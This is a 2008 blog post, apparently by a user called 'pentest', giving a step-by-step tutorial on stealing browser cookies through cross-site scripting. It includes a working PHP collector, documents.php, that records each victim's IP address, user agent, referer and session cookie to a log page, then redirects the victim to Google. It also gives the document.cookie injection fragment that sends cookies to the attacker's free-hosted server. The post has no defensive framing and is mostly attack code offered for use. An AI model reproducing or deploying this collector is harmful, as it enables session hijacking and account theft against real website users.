Sunday, October 12, 2008

How to grab cookies using XSS

How to grab cookies using XSS - Tutorial by_pentest

Tools used: Free hosting that support php
2 php pages
Vulnerable site.

Let's work: First register a free hosting account. You can try on this sites: http://www.funpic.de ; http://www.altervista.org ; http://www.netsons.org

After all: registration and activation, we need to upload this 2 php pages on the site.
vb.php
PHP Code:
<head>
<
meta http-equiv="Content-Language" content="it">
<
title>Cookies Stealther - Designed and programmed by R00t[ATI]</title>
</
head>

<
body bgcolor="#C0C0C0">

<
p align="center"><font color="#FF0000">COOKIES STEALTHER</font></p>
<
p align="center"><font face="Arial" color="#FF0000">By R00T[ATI]</font></p>
<
p align="left">&nbsp;</p>

</
body>

documents.php
PHP Code:
<?php

$ip
= $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET[c];

$time = date("Y-m-d G:i:s A");
$text = "<br><br>".$time." = ".$ip."<br><br>User Agent: ".$agent."<br>Referer: ".$referer."<br>Session: ".$data."<br><br><br>";

$file = fopen('vb.php' , 'a');
fwrite($file,$text);
fclose($file);
header("Location: http://www.google.com");

?>
Vb.php file is used to SHOW at the attacker what cookies are grabbed and other information.
documents.php file is used to GRAB information at the victim like: ip address, user agent and naturally cookies.
Now, we need to find vulnerable site to Cross Site Scripting (XSS). After this insert a script that call documents.php that grab document cookie by using "c" method: documents.php?c="+document.cookie;
For example:
Victim will be redirected to http://www.google.com (edit it in documents.php). And the attacker can be see victim cookies on vb.php

How to grab cookies using XSS - Tutorial by_pentest
/pentest

No comments: